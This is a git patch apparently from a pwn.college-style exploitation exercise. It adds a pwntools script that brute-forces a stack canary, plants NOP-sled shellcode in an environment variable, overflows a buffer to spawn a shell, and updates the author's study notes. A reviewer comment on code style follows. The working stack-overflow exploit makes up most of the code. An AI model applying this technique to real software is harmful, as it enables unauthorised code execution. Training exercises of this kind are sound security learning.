From 7195de9287248b132e2d26b11025dea19b2fc29a Mon Sep 17 00:00:00 2001
From: Kaushik Narayan R
Date: Mon, 9 Dec 2024 00:53:23 -0700
Subject: [PATCH] part 4 completed
---
 4.44/soln.py | 86 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Dojo Notes.md | 7 +++++
 2 files changed, 93 insertions(+)
 create mode 100644 4.44/soln.py
diff --git a/4.44/soln.py b/4.44/soln.py
new file mode 100644
index 0000000..e644240
--- /dev/null
+++ b/4.44/soln.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template /challenge/run
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or '/challenge/run')
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: No RELRO
+# Stack: No canary found
+# NX: NX unknown - GNU_STACK missing
+# PIE: No PIE (0x400000)
+# Stack: Executable
+# RWX: Has RWX segments
+
+# canary = b""
+canary = b"OiPe7C92"
+# canary_found = False
+canary_found = True
+io = None
+
+while not canary_found and len(canary) != 8: # unsigned long long -> 8 bytes
+ for byte in range(256): # byte value range
+ io = start()
+ io.send(b"A" * 256 + canary + bytes([byte]))
+ output = io.clean() # flush output
+ if b"\nHacking" not in output:
+ canary += bytes([byte])
+ print("updated canary:",canary)
+ break
+ io.close()
+
+print("final canary",canary)
+
+sled_len = 0x2000
+nop_sled = b"\x90" * sled_len
+
+shellcode = asm(shellcraft.sh())
+
+payload = nop_sled + shellcode
+
+io = start(env={"SHELLCODE_CMD": payload})
+
+io.recvuntil(b"for you: ")
+rsp_line = io.recvline()[:-1]
+rsp_hex = int(rsp_line, 16)
+print("Received rsp address:", rsp_line)
+
+target_shellcode_sled = p64(rsp_hex + sled_len)
+
+final_payload = (
+ target_shellcode_sled * 0x20 # 256 bytes
+ + canary # 8 bytes
+ + target_shellcode_sled * 0x8 # 64 bytes
+)
+print(len(final_payload))
+
+io.send(final_payload)
+io.interactive()
diff --git a/Dojo Notes.md b/Dojo Notes.md
index c6a1c3d..2685a9f 100644
--- a/Dojo Notes.md
+++ b/Dojo Notes.md
@@ -749,3 +749,10 @@ payload = input_str + padding + input_str_hash
 - stack pivot + shellcode
 - can't overwrite saved rip but can overwrite rbp
 - use it to repeatedly pop into rsp when leaving, thus making it reach the shellcode
+
+### .44 - working in a coal mine
+
+- stack canary, but set to static value lol
+- bruteforce to get canary
+- buffer overflow, but again too small, so have to go for env var
+- also similar stack pivot as we can't directly overwrite saved rip
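Review bot: `start` in this hunk takes a mutable default argument (`argv=[]`); the bug is latent because `[exe.path] + argv` builds a fresh list, but the template-generated signature is still the classic Python pitfall and should read `def start(argv=None, *a, **kw):` with `argv = [] if argv is None else argv` as the first statement. In the brute-force loop the `io.close()` placed after `break` is skipped on the matching iteration, so that child process handle is left open; closing in a `try`/`finally` or before the `break` avoids the leak (the loop is currently disabled by `canary_found = True`, so this is dormant today). The commented-out `# canary = b""` / `# canary_found = False` lines are dead code; replace them with a comment such as `# cached from an earlier run; set canary_found = False to recompute` so the two-mode behaviour is explicit rather than toggled by uncommenting. `print(len(final_payload))` is an unlabelled debug print; either drop it or label it like the other prints.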